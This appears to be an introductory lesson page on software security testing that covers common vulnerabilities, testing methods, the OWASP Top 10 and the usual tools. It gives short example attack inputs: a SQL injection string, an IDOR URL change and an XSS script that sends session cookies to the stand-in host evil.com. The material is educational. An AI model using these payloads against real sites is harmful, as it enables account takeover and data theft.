Software Testing Security Testing

Security testing identifies vulnerabilities in software that an attacker could exploit to gain unauthorised access, steal data, or disrupt service. It is not just for large corporations — any software that handles user data, payments, or login credentials needs security testing.

What Security Testing Protects

  ┌─────────────────────────────────────────────────────────┐
  │ CONFIDENTIALITY  → Data is visible only to allowed users│
  │ INTEGRITY        → Data cannot be altered unauthorised  │
  │ AVAILABILITY     → System stays up and accessible       │
  │ AUTHENTICATION   → Users are who they claim to be       │
  │ AUTHORISATION    → Users access only what they own      │
  │ NON-REPUDIATION  → Actions are traceable to their actor │
  └─────────────────────────────────────────────────────────┘

Common Security Vulnerabilities

SQL Injection

An attacker inserts malicious SQL commands into an input field. If the application passes this directly to the database without sanitising it, the attacker can read, modify, or delete all data.

  Login form Username field:
  Normal input:   user@test.com
  Attack input:   ' OR '1'='1

  If vulnerable, the SQL becomes:
  SELECT * FROM users WHERE email='' OR '1'='1'
  → Returns ALL user records → Attacker logs in as anyone

Cross-Site Scripting (XSS)

An attacker injects malicious scripts into a page viewed by other users. The victim's browser runs the script, which can steal session cookies, redirect the user, or perform actions on their behalf.

  Comment field input:
  Normal:  "Great article!"
  Attack:  <script>document.location='evil.com?c='+document.cookie</script>

  If the app displays comments without sanitising:
  → Other users' browsers execute the script
  → Attacker receives their session cookies

Broken Authentication

Weak session management, predictable tokens, or absence of multi-factor authentication allows attackers to impersonate legitimate users.

Insecure Direct Object References (IDOR)

A user changes a URL parameter to access another user's data.

  Normal URL:  /account/orders?user_id=1001
  Manipulated: /account/orders?user_id=1002

  If the server does not check ownership → User 1001 sees User 1002's orders

Sensitive Data Exposure

Passwords stored as plain text, credit card numbers logged in error files, or API keys hardcoded in source code.

Security Misconfiguration

Default admin credentials left unchanged, unnecessary features enabled, or error messages that expose internal server details to attackers.

Types of Security Testing

Vulnerability Scanning

Automated tools scan the application and its infrastructure for known vulnerabilities. Tools like OWASP ZAP, Nessus, and Burp Suite perform these scans.

Penetration Testing (Pen Testing)

A human security expert simulates a real attack on the system. Unlike automated scanning, pen testers use creativity and experience to find vulnerabilities that tools miss. The result is a detailed report of every weakness found and how it was exploited.

  Pen Test Phases:
  ──────────────────────────────────────────
  1. Reconnaissance  → Gather info about the target
  2. Scanning        → Find open ports and services
  3. Exploitation    → Attempt to exploit vulnerabilities
  4. Post-Exploit    → Assess damage potential
  5. Reporting       → Document everything found

Static Application Security Testing (SAST)

Analyses the source code for security flaws without running the application. Finds issues like hardcoded passwords, unsafe function calls, and poor input sanitisation early in development.

Dynamic Application Security Testing (DAST)

Tests the running application by sending attacks to it from the outside, just like a real attacker would. Finds vulnerabilities that only appear when the application is live.

API Security Testing

Tests API endpoints for broken authentication, missing rate limiting, data over-exposure, and injection vulnerabilities.

The OWASP Top 10

The Open Web Application Security Project (OWASP) publishes a list of the ten most critical web application security risks. Every tester should know these:

  1.  Broken Access Control
  2.  Cryptographic Failures
  3.  Injection (SQL, XSS, etc.)
  4.  Insecure Design
  5.  Security Misconfiguration
  6.  Vulnerable and Outdated Components
  7.  Identification and Authentication Failures
  8.  Software and Data Integrity Failures
  9.  Security Logging and Monitoring Failures
  10. Server-Side Request Forgery (SSRF)

The OWASP Top 10 is updated periodically and is the starting point for any web application security test checklist.

Security Testing Tools

  • OWASP ZAP: Free, open-source scanner for finding web application vulnerabilities.
  • Burp Suite: Industry-standard web security testing platform used by professional pen testers.
  • Nessus: Vulnerability scanner for networks and infrastructure.
  • SQLMap: Automated tool for detecting and exploiting SQL injection vulnerabilities.
  • Metasploit: Framework for pen testing and exploit development.
Previous lessons
Back to courses
Next lessons

Leave a Comment